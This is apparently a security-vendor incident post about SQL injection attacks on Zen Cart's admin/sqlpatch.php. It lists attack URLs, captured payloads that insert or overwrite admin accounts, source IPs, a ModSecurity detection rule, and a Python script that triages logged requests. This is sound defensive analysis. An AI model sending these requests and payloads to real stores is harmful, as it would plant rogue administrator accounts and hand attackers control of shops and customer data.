The attacks send a POST request to the following URLs:
POST /admin/sqlpatch.php/password_forgotten.php?action=execute
POST /black_market/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /cart/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /product_info.php/products_id/1658/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /shop/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /shopping/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /store/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /tienda/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /tradeshow/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /zencart/admin/sqlpatch.php/password_forgotten.php?action=execute
The attacks include a POST payload parameter called "query_string" containing the following different payloads:
insert into `admin` ( `admin_id`, `admin_name`, `admin_email`, `admin_pass`, `admin_level` ) values ( '2112', 'jembot', 'adm.net', 'abc22a464d79887aeb11486b74081fb5:3d', '0' );'
insert into admin (admin_id, admin_name, admin_email, admin_pass) values (666, 'nobody', 'crew.tools43@yahoo.com', '21232f297a57a5a743894a0e4a801fc3:be');'
insert into admin values (12, 'sales', 'admin@localhost', '351683ea4e19efe34874b501fdbf9792:9b', 1);'
show tables;'
update admin set admin_name='adminz', admin_email='admin@shopadmin.com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' where admin_id='1';'
As you can see, the attacker(s) are attempting to add new user account data to the "admin" group within the back-end Zen Cart DB.
There were a total of 116 attack requests detected from 4 source IP addresses:
125.165.165.31
173.230.128.50
193.107.86.145
209.239.114.225
These attacks are identified by the following ModSecurity rule from our SpiderLabs Commercial Rules Feed which identifies SQL Injection attacks against this Zen Cart vulnerability:
#
# (2055343) ModSecurity Rules from Trustwave SpiderLabs: Zen Cart admin/sqlpatch.php query_string Parameter SQL Injection
#
SecRule REQUEST_LINE "@contains admin/sqlpatch.php" "chain,phase:2,block,rev:'031312',t:none,t:urlDecodeUni,capture,logdata:'%{args.query_string}',severity:'2',id:2055343,msg:'SLR: Zen Cart admin/sqlpatch.php query_string Parameter SQL Injection',tag:'WEB_ATTACK/SQL_INJECTION',tag:'http://osvdb.org/show/osvdb/55343'"
SecRule "ARGS:query_string" "@pm # \" /* */ ` ' ( ) ; --" "ctl:auditLogParts=+E"
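The rule's two conditions can also be replayed offline when reviewing captured requests, and the matched SQL tells a responder which account names to look for in the admin table. The Python below is an added example, not part of the original post or the SpiderLabs rules feed; the function names and sample requests are constructed, `unquote` only approximates `t:urlDecodeUni`, and the value splitting assumes no commas inside quoted strings.

```python
import re
from urllib.parse import parse_qs, unquote, urlencode, urlsplit

TARGET = "admin/sqlpatch.php"                       # first SecRule, @contains
PM_TOKENS = ["#", '"', "/*", "*/", "`", "'", "(", ")", ";", "--"]  # second SecRule, @pm

def match_rule(request_line, body):
    """Return the query_string values that would trip the chained rule."""
    if TARGET not in unquote(request_line):         # approximates t:urlDecodeUni
        return []
    parts = request_line.split()
    query = urlsplit(parts[1]).query if len(parts) > 1 else ""
    values = []
    for raw in (query, body):                       # ARGS = URL args + form body
        values += parse_qs(raw, keep_blank_values=True, separator="&").get("query_string", [])
    return [v for v in values if any(tok in v for tok in PM_TOKENS)]

def planted_admin(sql):
    """Best effort: the admin_name an INSERT/UPDATE on `admin` would set."""
    m = re.search(r"admin_name\s*=\s*'([^']*)'", sql, re.I)
    if m:                                           # UPDATE ... SET admin_name='x'
        return m.group(1)
    m = re.match(r"\s*insert\s+into\s+`?admin`?\s*(?:\(([^)]*)\))?\s*values\s*\((.*)\)",
                 sql, re.I | re.S)
    if not m:
        return None
    vals = [v.strip().strip("'") for v in m.group(2).split(",")]
    cols = [c.strip(" `") for c in m.group(1).split(",")] if m.group(1) else []
    # Assumption: with no column list, admin_name is the second value,
    # as in the column order of the payloads shown in this post.
    idx = cols.index("admin_name") if "admin_name" in cols else 1
    return vals[idx] if idx < len(vals) else None

def triage(requests):
    """(statement verb, planted admin_name or None) for each matching request."""
    return [(sql.split()[0].lower(), planted_admin(sql))
            for line, body in requests for sql in match_rule(line, body)]

PATH = "/shop/admin/sqlpatch.php/password_forgotten.php?action=execute"
SAMPLES = [  # constructed requests modelled on the ones above; values are placeholders
    (f"POST {PATH} HTTP/1.1", urlencode({"query_string":
        "insert into admin (admin_id, admin_name, admin_pass) values (901, 'example_user', 'HASH:SALT');"})),
    (f"POST {PATH} HTTP/1.1", urlencode({"query_string":
        "update admin set admin_name='example_admin' where admin_id='1';"})),
    (f"POST {PATH} HTTP/1.1", urlencode({"query_string": "show tables;"})),
    ("POST /shop/index.php?main_page=login HTTP/1.1", "email_address=user%40example.com"),
]

if __name__ == "__main__":
    for verb, name in triage(SAMPLES):
        print(verb, name)
```

Any name returned by `planted_admin` is a candidate for an account audit of the store's admin table.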